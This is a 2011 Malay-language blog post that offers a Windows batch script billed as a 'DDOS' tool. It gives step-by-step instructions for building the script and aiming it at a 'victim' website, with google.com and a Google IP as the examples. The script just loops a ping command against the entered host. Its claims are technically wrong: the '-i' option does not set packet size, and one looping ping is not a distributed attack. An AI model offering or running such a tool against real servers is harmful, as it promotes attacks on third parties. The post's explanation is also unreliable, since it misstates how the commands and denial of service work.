DRAGONFOCRE FM

Sunday, 29 May 2011

DDOS Daripada Notepad (Distributed Denial of Service)

Didalam post kali ini, saya ingin berkongsikan sedikit ilmu yang ada pada semua
bagai mana hendak membuat aplikasi DDOS(Distributed Denial of Service) dengan
bantuan Batch File.

Sila ikut Step By Step :

.::[Cara Pembuatan]::.

1) Buka notepad
2) Copy Code dibawah ini

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS3) Paste code tersebut kedalam notepad
4) Save file tersebut
5) tukarkan nama file dan extension file tersebut kepada "DDOS.bat"
6) Siap cara pembuatan


.::Cara Guna::.

1) Buka File "DDOS.bat" itu tadi.
2) Pada menu Server Target tersebut, Masukkan Url website mangsa.
  • Contoh : google.com
3) Tekan "Enter"
4) Selepas anda tekan enter, applikasi ini akan memaparkan :

5) Langkah seterusnya, Bila applikasi ini minta anda masukkan "ip host" anda perlulah memasukkan Nombor IP yang telah tercatit semasa ujian Ping diatas dilakukan.
  • Contoh : 209.85.175.104
6) Tekan "Enter"
7) Seterusnya anda di minta untuk memasukkan "Packet Size". Masukkan jumah "100000"
seperti gambar di bawah.

8) Kemudian tekan butang "Enter"
9) Serangan DDOS sedang dijalankan seperti gambar dibawah :

10) Serangan DDOS akan berlaku selagi anda belum tutup Applikasi ini.
11) Good Luck!


Related Posts Plugin for WordPress, Blogger...

5 comments: